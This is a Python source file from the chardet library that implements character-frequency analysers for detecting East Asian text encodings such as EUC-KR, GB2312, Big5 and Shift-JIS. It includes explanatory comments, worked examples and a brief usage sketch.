Current File : //usr/lib/python2.7/site-packages/chardet/chardistribution.py
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#   Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301  USA
######################### END LICENSE BLOCK #########################

from .euctwfreq import (EUCTW_CHAR_TO_FREQ_ORDER, EUCTW_TABLE_SIZE,
                        EUCTW_TYPICAL_DISTRIBUTION_RATIO)
from .euckrfreq import (EUCKR_CHAR_TO_FREQ_ORDER, EUCKR_TABLE_SIZE,
                        EUCKR_TYPICAL_DISTRIBUTION_RATIO)
from .gb2312freq import (GB2312_CHAR_TO_FREQ_ORDER, GB2312_TABLE_SIZE,
                         GB2312_TYPICAL_DISTRIBUTION_RATIO)
from .big5freq import (BIG5_CHAR_TO_FREQ_ORDER, BIG5_TABLE_SIZE,
                       BIG5_TYPICAL_DISTRIBUTION_RATIO)
from .jisfreq import (JIS_CHAR_TO_FREQ_ORDER, JIS_TABLE_SIZE,
                      JIS_TYPICAL_DISTRIBUTION_RATIO)


class CharDistributionAnalysis(object):
    ENOUGH_DATA_THRESHOLD = 1024
    SURE_YES = 0.99
    SURE_NO = 0.01
    MINIMUM_DATA_THRESHOLD = 3

    def __init__(self):
        # Mapping table to get frequency order from char order (obtained
        # from get_order())
        self._char_to_freq_order = None
        self._table_size = None  # Size of above table
        # This is a constant value which varies from language to language,
        # used in calculating confidence.  See
        # http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html
        # for further detail.
        self.typical_distribution_ratio = None
        self._done = None
        self._total_chars = None
        self._freq_chars = None
        self.reset()

    def reset(self):
        """reset analyser, clear any state"""
        # If this flag is set to True, detection is done and a conclusion
        # has been reached
        self._done = False
        self._total_chars = 0  # Total characters encountered
        # The number of characters whose frequency order is less than 512
        self._freq_chars = 0

    def feed(self, char, char_len):
        """feed a character with known length"""
        if char_len == 2:
            # we only care about 2-byte characters in our distribution analysis
            order = self.get_order(char)
        else:
            order = -1
        if order >= 0:
            self._total_chars += 1
            # order is valid
            if order < self._table_size:
                if 512 > self._char_to_freq_order[order]:
                    self._freq_chars += 1

    def get_confidence(self):
        """return confidence based on existing data"""
        # if we didn't receive any characters in our consideration range,
        # return a negative answer
        if self._total_chars <= 0 or self._freq_chars <= self.MINIMUM_DATA_THRESHOLD:
            return self.SURE_NO

        if self._total_chars != self._freq_chars:
            r = (self._freq_chars / ((self._total_chars - self._freq_chars)
                 * self.typical_distribution_ratio))
            if r < self.SURE_YES:
                return r

        # normalize confidence (we don't want to be 100% sure)
        return self.SURE_YES
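        # Worked illustration of the formula above (hypothetical numbers):
        # with 1000 two-byte characters, 800 of them frequent, and a
        # typical_distribution_ratio of 0.75, r = 800 / ((1000 - 800) * 0.75)
        # = 5.33, which exceeds SURE_YES and is reported as 0.99.  With only
        # 100 frequent characters, r = 100 / (900 * 0.75) = 0.148 and that
        # value is returned directly.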

    def got_enough_data(self):
        # It is not necessary to receive all data to draw a conclusion.
        # For charset detection, a certain amount of data is enough.
        return self._total_chars > self.ENOUGH_DATA_THRESHOLD

    def get_order(self, byte_str):
        # We do not handle characters based on the original encoding string,
        # but convert this encoding string to a number, here called order.
        # This allows multiple encodings of a language to share one frequency
        # table.
        return -1


class EUCTWDistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(EUCTWDistributionAnalysis, self).__init__()
        self._char_to_freq_order = EUCTW_CHAR_TO_FREQ_ORDER
        self._table_size = EUCTW_TABLE_SIZE
        self.typical_distribution_ratio = EUCTW_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for euc-TW encoding, we are interested in the following byte ranges:
        #   first  byte range: 0xc4 -- 0xfe
        #   second byte range: 0xa1 -- 0xfe
        # no validation needed here; the state machine has already done that
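        # Illustrative mapping (hypothetical byte pair): 0xC5 0xA2 maps to
        # 94 * (0xC5 - 0xC4) + (0xA2 - 0xA1) = 94 + 1 = 95; 94 is the number
        # of second-byte values in the 0xa1 -- 0xfe range.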
        first_char = byte_str[0]
        if first_char >= 0xC4:
            return 94 * (first_char - 0xC4) + byte_str[1] - 0xA1
        else:
            return -1


class EUCKRDistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(EUCKRDistributionAnalysis, self).__init__()
        self._char_to_freq_order = EUCKR_CHAR_TO_FREQ_ORDER
        self._table_size = EUCKR_TABLE_SIZE
        self.typical_distribution_ratio = EUCKR_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for euc-KR encoding, we are interested in the following byte ranges:
        #   first  byte range: 0xb0 -- 0xfe
        #   second byte range: 0xa1 -- 0xfe
        # no validation needed here; the state machine has already done that
        first_char = byte_str[0]
        if first_char >= 0xB0:
            return 94 * (first_char - 0xB0) + byte_str[1] - 0xA1
        else:
            return -1


class GB2312DistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(GB2312DistributionAnalysis, self).__init__()
        self._char_to_freq_order = GB2312_CHAR_TO_FREQ_ORDER
        self._table_size = GB2312_TABLE_SIZE
        self.typical_distribution_ratio = GB2312_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for GB2312 encoding, we are interested in the following byte ranges:
        #  first  byte range: 0xb0 -- 0xfe
        #  second byte range: 0xa1 -- 0xfe
        # no validation needed here; the state machine has already done that
        first_char, second_char = byte_str[0], byte_str[1]
        if (first_char >= 0xB0) and (second_char >= 0xA1):
            return 94 * (first_char - 0xB0) + second_char - 0xA1
        else:
            return -1


class Big5DistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(Big5DistributionAnalysis, self).__init__()
        self._char_to_freq_order = BIG5_CHAR_TO_FREQ_ORDER
        self._table_size = BIG5_TABLE_SIZE
        self.typical_distribution_ratio = BIG5_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for big5 encoding, we are interested in the following byte ranges:
        #   first  byte range: 0xa4 -- 0xfe
        #   second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe
        # no validation needed here; the state machine has already done that
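        # Illustrative mapping (hypothetical byte pairs): 0xA5 0xA2 maps to
        # 157 * (0xA5 - 0xA4) + (0xA2 - 0xA1) + 63 = 221, while 0xA5 0x50
        # maps to 157 * 1 + (0x50 - 0x40) = 173.  157 = 63 trail bytes in
        # 0x40 -- 0x7e plus 94 in 0xa1 -- 0xfe; the '+ 63' skips the low range.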
        first_char, second_char = byte_str[0], byte_str[1]
        if first_char >= 0xA4:
            if second_char >= 0xA1:
                return 157 * (first_char - 0xA4) + second_char - 0xA1 + 63
            else:
                return 157 * (first_char - 0xA4) + second_char - 0x40
        else:
            return -1


class SJISDistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(SJISDistributionAnalysis, self).__init__()
        self._char_to_freq_order = JIS_CHAR_TO_FREQ_ORDER
        self._table_size = JIS_TABLE_SIZE
        self.typical_distribution_ratio = JIS_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for sjis encoding, we are interested in the following byte ranges:
        #   first  byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe
        #   second byte range: 0x40 -- 0x7e , 0x81 -- 0xfe
        # no validation needed here; the state machine has already done that
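        # 188 is the number of trail-byte values per lead byte, and the
        # '+ 31' offset skips the 31 rows used by the 0x81 -- 0x9f lead
        # bytes, e.g. (hypothetical pair) 0xE0 0x41 maps to
        # 188 * 31 + (0x41 - 0x40) = 5829.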
        first_char, second_char = byte_str[0], byte_str[1]
        if (first_char >= 0x81) and (first_char <= 0x9F):
            order = 188 * (first_char - 0x81)
        elif (first_char >= 0xE0) and (first_char <= 0xEF):
            order = 188 * (first_char - 0xE0 + 31)
        else:
            return -1
        order = order + second_char - 0x40
        if second_char > 0x7F:
            order = -1
        return order


class EUCJPDistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(EUCJPDistributionAnalysis, self).__init__()
        self._char_to_freq_order = JIS_CHAR_TO_FREQ_ORDER
        self._table_size = JIS_TABLE_SIZE
        self.typical_distribution_ratio = JIS_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for euc-JP encoding, we are interested in the following byte ranges:
        #   first  byte range: 0xa0 -- 0xfe
        #   second byte range: 0xa1 -- 0xfe
        # no validation needed here; the state machine has already done that
        char = byte_str[0]
        if char >= 0xA0:
            return 94 * (char - 0xA1) + byte_str[1] - 0xA1
        else:
            return -1
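

# ---------------------------------------------------------------------------
# Illustrative usage sketch (assumed driver code, not chardet's prober
# plumbing): feed an analyser some two-byte sequences and read back its
# confidence.  The sample bytes are hypothetical EUC-KR pairs; with this
# little input get_confidence() stays at SURE_NO, real probers feed far more.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    analyser = EUCKRDistributionAnalysis()
    sample = bytearray(b'\xb0\xa1\xb0\xa2\xb0\xa3')  # three 2-byte sequences
    for i in range(0, len(sample), 2):
        analyser.feed(sample[i:i + 2], 2)  # feed one 2-byte character at a time
    print(analyser.get_confidence())       # 0.01 (SURE_NO) for so few characters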
